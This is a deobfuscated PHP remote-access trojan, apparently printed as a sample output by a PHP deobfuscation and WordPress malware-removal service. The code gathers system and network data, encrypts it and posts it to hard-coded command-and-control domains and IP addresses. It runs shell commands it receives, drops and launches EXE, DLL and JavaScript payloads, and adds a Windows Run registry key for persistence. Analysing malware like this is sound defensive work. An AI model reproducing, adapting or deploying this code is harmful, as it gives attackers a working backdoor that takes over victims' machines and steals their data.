                        $pcI7I = '';
                        exec("powershell -c " . eci0t("Get-PSDrive -PSProvider FileSystem | ConvertTo-Json"), $pcI7I, $xv08g);
                        if (!($xv08g !== 0)) {
                            $JGJW0["drives"] = json_decode(null, true);
                            $pcI7I = '';
                            exec("powershell -c " . eCI0t("Get-NetNeighbor -AddressFamily IPv4 | Where-Object { {$_}.State -ne 'Permanent' } | Select-Object @{Name='Interface'; Expression={\$_.InterfaceAlias}}, @{Name='Internet Address'; Expression={\$_.IPAddress}}, @{Name='Physical Address'; Expression={\$_.LinkLayerAddress}}, @{Name='Type'; Expression={'dynamic'}} | ConvertTo-Json"), $pcI7I, $xv08g);
                            if (!($xv08g !== 0)) {
                                $JGJW0["arp"] = json_decode(null, true);
                                $pcI7I = '';
                                return $JGJW0;
                            }
                            throw new Exception("Failed to execute command");
                        }
                        throw new Exception("Failed to execute command");
                    }
                    throw new Exception("Failed to execute command");
                }
                throw new Exception("Failed to execute command");
            }
            throw new Exception("Failed to execute command");
        }
        throw new Exception("Failed to execute command");
    }
    function r7s9B(&$xbNO5, $eAmVW)
    {
        $s9r5b = ord($eAmVW[0]);
        $cbiCS = strlen($xbNO5);
        $kt3y8 = strlen($eAmVW);
        $Mc_Hp = 0;
        kAq95:
        if (!($Mc_Hp < $cbiCS)) {
            // [PHPDeobfuscator] Implied return
            return;
        }
        $s9r5b = ($s9r5b + ($s9r5b + $Mc_Hp % 256)) % 256;
        $xbNO5[$Mc_Hp] = chr(ord($xbNO5[$Mc_Hp]) ^ (ord($eAmVW[$Mc_Hp % $kt3y8]) ^ $s9r5b) % 256);
        ++$Mc_Hp;
        goto kAq95;
    }
    function A2uxo($xbNO5)
    {
        $Ot6LN = mt_rand(0, 100000000);
        $rasAm = pack("V", $Ot6LN);
        R7s9b($xbNO5, $rasAm);
        $ERqBI = $xbNO5 . $rasAm;
        return gzencode($ERqBI, 5, FORCE_GZIP);
    }
    function EtUpz($A4YkN, $xbNO5)
    {
        global $JcEot;
        $H6YXK = ["http" => ["method" => "POST", "header" => ["Content-type: application/octet-stream"], "content" => $xbNO5, "ignore_errors" => true, "timeout" => 20]];
        $nG_P0 = "http://" . $A4YkN . ":" . $JcEot . rXiXT();
        $nuWcv = stream_context_create($H6YXK);
        $HhbRp = null;
        set_error_handler(function ($l2XVo, $Mxyq3) use(&$HhbRp) {
            $HhbRp = $Mxyq3;
        });
        $RwYxj = file_get_contents($nG_P0, false, $nuWcv);
        restore_error_handler();
        if (!($RwYxj === false)) {
            $Ql4QK = 0;
            if (!isset($http_response_header[0])) {
                goto ycYgX;
            }
            preg_match("/HTTP\\/\\d\\.\\d\\s+(\\d{3})/", $http_response_header[0], $fUPyD);
            if (!isset($fUPyD[1])) {
                goto oo9y0;
            }
            $Ql4QK = (int) $fUPyD[1];
            oo9y0:
            ycYgX:
            return ["content" => $RwYxj, "headers" => $http_response_header, "status" => $http_response_header[0] ?? null, "code" => $Ql4QK];
        }
        throw new Exception("HTTP request failed: " . ($HhbRp ?: "Unknown error"));
    }
    function Y40sz($nG_P0, $Yem6z)
    {
        if (file_exists($Yem6z)) {
            goto qw6IQ;
        }
        if (mkdir($Yem6z, 0777, true)) {
            qw6IQ:
            $cTc0_ = file_get_contents($nG_P0);
            $PH23F = tmpfile();
            fwrite($PH23F, $cTc0_);
            rewind($PH23F);
            $abtZm = new XdeZr();
            $Mbxm4 = $abtZm->open(stream_get_meta_data($PH23F)["uri"]);
            if (!($Mbxm4 !== true)) {
                if ($abtZm->extractTo($Yem6z)) {
                    $abtZm->close();
                    fclose($PH23F);
                    return true;
                }
                $abtZm->close();
                fclose($PH23F);
                return false;
            }
            fclose($PH23F);
            return false;
        }
        return false;
    }
    function UrHlx()
    {
        global $szWC8, $pC2k6;
        if (QrOFA()) {
            $oyBW1 = "." . xNked(12) . ".txt";
            $ZqddJ = shell_exec("wmic process where processid=" . getmypid() . " get commandline");
            if (!(!$ZqddJ || !preg_match_all("/\\s-r\\s/", $ZqddJ))) {
                $pDMmF = explode($pC2k6, $ZqddJ, 2);
                $xU41z = trim($pDMmF[1] ?? '');
                $Y72oh = preg_split("/php\\.exe.*?\\s-r\\s+/", $xU41z, 2);
                $uJtGi = isset($Y72oh[1]) ? trim(str_replace($szWC8, '', $Y72oh[1])) : '';
                file_put_contents($oyBW1, $uJtGi);
                goto hOX6z;
            }
            return false;
        }
        $oyBW1 = "/var/www/html/input.php";
        hOX6z:
        exec("reg add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v " . Eci0t(VjppV()) . " /t REG_SZ /d " . eci0t("\\" . $szWC8 . PHP_BINARY . "\\" . $szWC8 . " \\" . $szWC8 . $oyBW1 . "\\" . $szWC8) . " /f");
        return true;
    }
    function vJppV()
    {
        $inBis = scandir(getenv("APPDATA")) + scandir(getenv("LOCALAPPDATA"));
        $inBis = array_diff($inBis, [".", ".."]);
        $inBis = array_values($inBis);
        print_r($inBis);
        return $inBis[rand(0, count($inBis) - 1)];
    }
    function XNKeD($zcvYL = 16)
    {
        $Ke3ba = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ";
        $brHta = strlen($Ke3ba);
        $b3TRq = '';
        $Mc_Hp = 0;
        NWTYT:
        if (!($Mc_Hp < $zcvYL)) {
            return $b3TRq;
        }
        $b3TRq .= $Ke3ba[rand(0, $brHta - 1)];
        $Mc_Hp++;
        goto NWTYT;
    }
    $wGaOo = null;
    function deG1t($d0PbW)
    {
        global $wGaOo;
        $qA50S = array(0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "w"));
        $Nr7MT = proc_open($d0PbW, $qA50S, $V8__K);
        if (is_resource($Nr7MT)) {
            $wGaOo = ["process" => $Nr7MT, "pipes" => $V8__K];
            // [PHPDeobfuscator] Implied return
            return;
        }
        return "<failed>";
    }
    function rcbqD()
    {
        global $wGaOo;
        if (!(!$wGaOo || !isset($wGaOo["process"]) || !isset($wGaOo["pipes"]))) {
            $Nr7MT = $wGaOo["process"];
            $V8__K = $wGaOo["pipes"];
            if (!proc_get_status($Nr7MT)["running"]) {
                $wGaOo = null;
                $gGLsg = stream_get_contents($V8__K[1]);
                $Dbe2H = stream_get_contents($V8__K[2]);
                fclose($V8__K[0]);
                fclose($V8__K[1]);
                fclose($V8__K[2]);
                $nSJJJ = proc_close($Nr7MT);
                $PS9aF = "out:PHP_EOL";
                if ($gGLsg) {
                    $PS9aF .= $gGLsg;
                    goto TkkmA;
                }
                $PS9aF .= "<empty>";
                TkkmA:
                if (!$Dbe2H) {
                    goto UBiN4;
                }
                $PS9aF .= "PHP_EOLerr(" . $nSJJJ . "):" . PHP_EOL . $Dbe2H;
                UBiN4:
                return $PS9aF;
            }
            echo "{$last_command} == running" . PHP_EOL;
            return null;
        }
        echo "{$last_command} == null" . PHP_EOL;
        return null;
    }
    function lFVIE($xLjoz, $d0PbW)
    {
        global $szWC8, $pC2k6;
        $o_rCT = "powershell.exe -WindowStyle Hidden -c " . ECi0t("Start-Process -WindowStyle Hidden -FilePath '" . $xLjoz . "'" . ($d0PbW ? " -ArgumentList '" . preg_replace("/" . $szWC8 . "/", "\\" . $szWC8, $d0PbW) . "'" : ''));
        echo $o_rCT . $pC2k6 . $pC2k6;
        shell_exec($o_rCT);
    }
    function BMLFv()
    {
        $qHIxs = getenv("APPDATA") . "\\" . VJPpv() . rand(0, 1000000);
        mkdir($qHIxs);
        return $qHIxs;
    }
    function mOJ2M($A4YkN)
    {
        global $rst7P, $D_3Y7, $szWC8, $dCN4_;
        if (!(($u7kKd = RCbQd()) !== null)) {
            goto bVOXu;
        }
        $rst7P["cmd"] = $u7kKd;
        bVOXu:
        $uJtGi = EtupZ($A4YkN, A2UXO(json_encode($rst7P, JSON_PRETTY_PRINT)));
        unset($rst7P["cmd"]);
        $o0HyG = $uJtGi["content"];
        $Ql4QK = $uJtGi["code"];
        if (!($Ql4QK == 204)) {
            if (!($Ql4QK !== 200)) {
                $oAl9r = substr($o0HyG, strlen($o0HyG) - 4, strlen($o0HyG));
                $o0HyG = substr($o0HyG, 0, strlen($o0HyG) - 4);
                R7s9B($o0HyG, $oAl9r);
                $miAdf = ord($o0HyG[strlen($o0HyG) - 1]);
                $o0HyG = substr($o0HyG, 0, strlen($o0HyG) - 1);
                $d0PbW = null;
                switch ($miAdf) {
                    case $D_3Y7["CMD"]:
                        echo "CMDPHP_EOL";
                        DEg1T($o0HyG);
                        return;
                    case $D_3Y7["ACTIVE"]:
                        echo "ACTIVEPHP_EOL";
                        $dCN4_ = unpack("V", $o0HyG)[1];
                        return;
                    case $D_3Y7["AUTORUN"]:
                        echo "AUTORUNPHP_EOL";
                        URHlX();
                        return;
                    case $D_3Y7["OFF"]:
                        echo "OFFPHP_EOL";
                        exit(0);
                    case $D_3Y7["EXE"]:
                        echo "EXEPHP_EOL";
                        $xLjoz = BMlfV() . "\\" . xNkEd(8) . ".exe";
                        file_put_contents($xLjoz, $o0HyG);
                        goto nJLGE;
                    case $D_3Y7["DLL"]:
                        echo "DLLPHP_EOL";
                        $yYiH5 = bmlfV() . "\\" . XnkeD(8) . ".png";
                        $xLjoz = "C:\\Windows\\System32\r\nundll32.exe";
                        $d0PbW = ecI0T($yYiH5) . " start";
                        file_put_contents($yYiH5, $o0HyG);
                        goto nJLGE;
                    case $D_3Y7["JS"]:
                        echo "JSPHP_EOL";
                        $xLjoz = getenv("APPDATA") . "\\" . "node-v21.7.3-win-x64\r\node.exe";
                        if (!(!file_exists($xLjoz) && !y40SZ("http://nodejs.org/dist/v21.7.3/node-v21.7.3-win-x64.zip", getenv("APPDATA")))) {
                            $d0PbW = BmLfv() . "\\" . XNKed(8) . ".jpg";
                            file_put_contents($d0PbW, $o0HyG);
                            goto nJLGE;
                        }
                        echo "failed install nodejsPHP_EOL";
                        return;
                    default:
                        echo "OTHERPHP_EOL";
                        file_put_contents(BmlfV() . "\\" . XnkeD(8) . ".txt", $o0HyG);
                        return;
                }
                nJLGE:
                lfViE($xLjoz, $d0PbW);
                // [PHPDeobfuscator] Implied return
                return;
            }
            throw new Exception("HTTP request failed: " . $Ql4QK);
        }
        echo "204PHP_EOL";
        return;
    }
    $LcYWr = 10;
    $b2dL6 = ["159.69.187.78", "64.95.12.71", "184.95.51.165"];
    $h0b7d = ["windows-msgas.com", "event-datamicrosoft.live", "varying-rentals-calgary-predict.trycloudflare.com"];
    if (count($h0b7d) > 0) {
        $A4YkN = $h0b7d[mt_rand(0, 1000) % count($h0b7d)];
        goto sIg7z;
    }
    $A4YkN = $b2dL6[mt_rand(0, 1000) % count($b2dL6)];
    sIg7z:
    $TZ64Y = 200;
    $dlA_m = 0;
    V3Oj2:
    if (!true) {
        // [PHPDeobfuscator] Implied script end
        return;
    }
    try {
        echo $A4YkN . PHP_EOL;
        echo $dlA_m . PHP_EOL;
        moJ2m($A4YkN);
        if ($dCN4_ > 0) {
            $LcYWr = 10;
            $dCN4_--;
            goto iaT6S;
        }
        $LcYWr = 300;
        iaT6S:
        if ($dlA_m >= $TZ64Y + 10) {
            $dlA_m = $TZ64Y - 10;
            if (!(count($h0b7d) > 0)) {
                goto njjkr;
            }
            $A4YkN = $h0b7d[mt_rand(0, 1000) % count($h0b7d)];
            njjkr:
            goto RCrAZ;
        }
        if ($dlA_m < $TZ64Y) {
            $dlA_m = 0;
            goto LWgVS;
        }
        $dlA_m++;
        LWgVS:
        RCrAZ:
    } catch (Throwable $Umveq) {
        echo $pC2k6 . "Error: " . $Umveq->getMessage() . $pC2k6;
        $dlA_m++;
        if ($dlA_m < $TZ64Y && count($h0b7d) > 0) {
            $A4YkN = $h0b7d[mt_rand(0, 1000) % count($h0b7d)];
            goto QavQA;
        }
        $A4YkN = $b2dL6[mt_rand(0, 1000) % count($b2dL6)];
        QavQA:
        $LcYWr = 10;
        $dCN4_ = 0;
    }
    echo "delay: 10PHP_EOL";
    echo "active_cnt: 0PHP_EOL";
    sleep($LcYWr);
    goto V3Oj2;
}
LfVIE(PHP_BINARY, "-d extension=zip -d extension_dir=ext " . ECi0T("/var/www/html/input.php") . " 1");
return;

Malware detection & removal plugin for WordPress

PHP deobfuscation, decryption, reconstruction tool

Obfuscated php code

Decoded(de-Obfuscated) php code